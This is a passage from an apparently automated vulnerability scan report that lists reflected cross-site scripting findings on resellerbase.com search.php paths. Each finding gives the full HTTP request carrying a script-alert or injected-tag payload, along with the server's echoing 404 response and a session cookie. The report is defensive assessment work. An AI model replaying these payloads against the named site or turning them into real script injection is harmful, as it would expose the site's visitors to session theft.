The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 422d1<script>alert(1)</script>ab88edf375 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images422d1<script>alert(1)</script>ab88edf375/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images422d1<script>alert(1)</script>ab88edf375/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1449. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f712c<script>alert(1)</script>eeec3b33070 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images/search.phpf712c<script>alert(1)</script>eeec3b33070?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/search.phpf712c<script>alert(1)</script>eeec3b33070?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1450. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e7e61<a>5a550d5e26f was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/kosmos/images/search.php?keyword=search...&Submit3=Searche7e61<a>5a550d5e26f&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/search.php?keyword=search...&Submit3=Searche7e61<a>5a550d5e26f&opt=2 was not found on this server.</p>
...[SNIP]...

2.1451. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 44e42<a>d91e8da125c was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/kosmos/images/search.php?keyword=search...44e42<a>d91e8da125c&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/search.php?keyword=search...44e42<a>d91e8da125c&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1452. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8d93e<script>alert(1)</script>a2e50239b21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&8d93e<script>alert(1)</script>a2e50239b21=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&8d93e<script>alert(1)</script>a2e50239b21=1 was not found on this server.</p>
...[SNIP]...

2.1453. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7105f<a>6a5a866b854 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=27105f<a>6a5a866b854 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=27105f<a>6a5a866b854 was not found on this server.</p>
...[SNIP]...

2.1454. http://www.resellerbase.com/detail/17/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 32edd<script>alert(1)</script>e6197284368 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail32edd<script>alert(1)</script>e6197284368/17/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail32edd<script>alert(1)</script>e6197284368/17/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1455. http://www.resellerbase.com/detail/17/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6d951<script>alert(1)</script>643ee9a6dfc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/176d951<script>alert(1)</script>643ee9a6dfc/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/176d951<script>alert(1)</script>643ee9a6dfc/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1456. http://www.resellerbase.com/detail/17/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8aba2<script>alert(1)</script>8f0d5cc9cd9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes8aba2<script>alert(1)</script>8f0d5cc9cd9/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes8aba2<script>alert(1)</script>8f0d5cc9cd9/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1457. http://www.resellerbase.com/detail/17/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 67bb8<script>alert(1)</script>815999dcc0e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos67bb8<script>alert(1)</script>815999dcc0e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos67bb8<script>alert(1)</script>815999dcc0e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1458. http://www.resellerbase.com/detail/17/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d2a9d<script>alert(1)</script>483d3251b6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/search.phpd2a9d<script>alert(1)</script>483d3251b6?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/search.phpd2a9d<script>alert(1)</script>483d3251b6?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1459. http://www.resellerbase.com/detail/17/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload cb226<a>40c60b14b40 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/kosmos/search.php?keyword=search...&Submit3=Searchcb226<a>40c60b14b40&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/search.php?keyword=search...&Submit3=Searchcb226<a>40c60b14b40&opt=2 was not found on this server.</p>
...[SNIP]...

2.1460. http://www.resellerbase.com/detail/17/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 36f03<a>f4875a77206 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/kosmos/search.php?keyword=search...36f03<a>f4875a77206&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/search.php?keyword=search...36f03<a>f4875a77206&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1461. http://www.resellerbase.com/detail/17/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fec64<script>alert(1)</script>41838068efb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&fec64<script>alert(1)</script>41838068efb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&fec64<script>alert(1)</script>41838068efb=1 was not found on this server.</p>
...[SNIP]...

2.1462. http://www.resellerbase.com/detail/17/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 66f1c<a>79d9cd6c731 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=266f1c<a>79d9cd6c731 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=266f1c<a>79d9cd6c731 was not found on this server.</p>
...[SNIP]...

2.1463. http://www.resellerbase.com/detail/17/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4eea7<script>alert(1)</script>69f881e76b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4eea7<script>alert(1)</script>69f881e76b2/17/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4eea7<script>alert(1)</script>69f881e76b2/17/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1464. http://www.resellerbase.com/detail/17/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b44ad<script>alert(1)</script>06fc2731a6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17b44ad<script>alert(1)</script>06fc2731a6a/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17b44ad<script>alert(1)</script>06fc2731a6a/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1465. http://www.resellerbase.com/detail/17/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 922d5<script>alert(1)</script>f1bc113228b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes922d5<script>alert(1)</script>f1bc113228b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes922d5<script>alert(1)</script>f1bc113228b/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1466. http://www.resellerbase.com/detail/17/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
